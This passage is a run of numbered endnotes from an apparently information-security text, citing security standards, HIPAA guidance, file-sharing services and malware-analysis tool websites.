[4]    International Organization for Standardization (ISO), “Information Technology – Security Techniques – Information Security Management Systems – Requirements,” ISO 27001, Switzerland, 2005.

[5]    National Institute of Standards and Technology, “Recommended Security Controls for Federal Information Systems and Organizations,” Special Publication 800-53, revision 3, (2009).

 

[6]    PCI Security Standards Council, “PCI Data Security Standard (DSS),” (2009).

 

[7]    http://java.sun.com/products/jsp.

 

[8]    For a more detailed discussion of recent revisions to healthcare legislation, visit http://www.hhs.gov/ocr/privacy/hipaa/understanding/index.html and http://healthit.ahrq.gov/portal/server.pt?open=512&objID=650&parentname=CommunityPage&parentid=7&mode=2&in_hi_userid=3882&cached=true.

 

[9]    The required risk analysis implementation specification at § 164.308(a)(1)(ii)(A), obligates a covered entity to “[c]onduct an accurate and thorough assessment of the potential risks and vulnerabilities to the confidentiality, integrity, and availability of electronic protected health information held by the covered entity.”

 

[10]   http://www.hhs.gov/ocr/privacy/hipaa/administrative/securityrule/radraftguidanceintro.html.

 

[11]   http://healthit.hhs.gov/portal/server.pt/gateway/PTARGS_0_10741_848086_0_0_18/Sma%20llPracticeSecurityGuide-1.pdf.

 

[12]   http://www.hhs.gov/ocr/privacy/hipaa/understanding/coveredentities/guidance_breachnotice.html; http://www.hhs.gov/ocr/privacy/hipaa/administrative/breachnotificationrule/index.html.

[13]   See ARRA at Section 13400 (1)(B).

 

[14]   Alexa.com lists Rapidshare.com as the 36th most popular website worldwide. While the accuracy of Alexa rankings is debatable, it is safe to say that Rapidshare outraces competitors such as Megaupload (86th) and Hotfile (199th) – http://www.alexa.com/siteinfo/rapidshare.com.

[15]   http://en.wikipedia.org/wiki/Swarm_downloading.

 

[16]   In reality this file is just a 300MB TrueCrypt archive with “rabbits” as the key.

 

[17]   http://www.rapidshare.com.

 

[18]   “The company’s Abuse Department … uses a hash filter to block uploads of files identified as unauthorized” – http://www.rapidshare.com/news.html.

 

[19]   http://support.mediafire.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=46&nav=0,2.

[20]   “It’s technically impossible to gather this amount of data without investing a sum in the hundreds of millions of Euros. Furthermore, the storage of download logs is prohibited in many countries. If anyone should legally try to force us to monitor customers to such an extent, we would gladly go through all levels of jurisdiction in order to avoid that” – http://rapidshare.com/privacypolicy.html.

 

[21]   http://rapidshare.com/news.html.

 

[22]   The free tool can be found at http://www.foundstone.com/us/resources-free-tools.asp.

 

[23]   Assuming 172.23.20.110 is the IP address associated with the system.

 

[24]   http://LearnREM.com.

 

[25]   http://REMnux.org.

 

[26]   http://mark0.net/soft-trid-e.html.

 

[27]   http://blog.didierstevens.com/programs/pdf-tools.

[28]   http://peid.has.it.

 

[29]   International Coach Federation – www.coachfederation.org.